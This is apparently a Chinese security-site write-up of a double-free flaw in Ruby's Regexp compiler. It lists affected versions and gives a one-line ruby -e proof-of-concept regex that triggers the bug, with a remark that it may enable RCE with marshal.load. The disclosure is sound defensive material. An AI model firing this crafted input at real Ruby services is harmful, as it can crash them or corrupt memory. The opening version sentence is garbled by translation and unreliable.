漏洞描述
在 Ruby 3.x 之前的 3.0.4 和 3.1.x 之前的 3.1.x 的 Regexp 编译器中发现了双重自由。如果受害者试图从不受信任的用户输入创建正则表达式,则攻击者可能能够写入意外的内存位置。
受影响的版本
ruby 3.0.3 或之前的版本
ruby 3.1.1 或之前的版本
ruby 2.6 系列和 2.7 系列不受影响
漏洞复现
由于 Regexp 编译过程中的错误,使用精心制作的源字符串创建 Regexp 对象可能会导致相同的内存被释放两次。这被称为“双重免费”漏洞。请注意,一般来说,创建和使用从不受信任的输入生成的 Regexp 对象被认为是不安全的。然而,在这种情况下,经过全面评估,我们将此问题视为一个漏洞。
POC
ruby -e '/(\x15\x17\xE2\xF5\xF5\xF5\xC2\x04\x08J,\x00\xD0\x00\x00(?(1)\xF5\xF5\xF5\xD7\xF5\xF5\xF5\x87\x04\xFA555\xBEJ,\x18FF\x15\xFF|\x03\x01\x00\x01\x00\x00\x8Fr|)44\x00\x8Fr|)+/m'
影响
与 marshal.load 配合可能会导致 RCE 攻击
感谢您的来访,获取更多精彩文章请收藏本站。
© 版权声明
本站网络名称:
孤勇者社区
本站永久网址:
https://www.gyzsq.com
网站侵权说明:
本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ324470778删除处理。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
喜欢就支持一下吧
相关推荐
评论 共2条
欢迎您留下宝贵的见解!
- 最新
- 最热
只看作者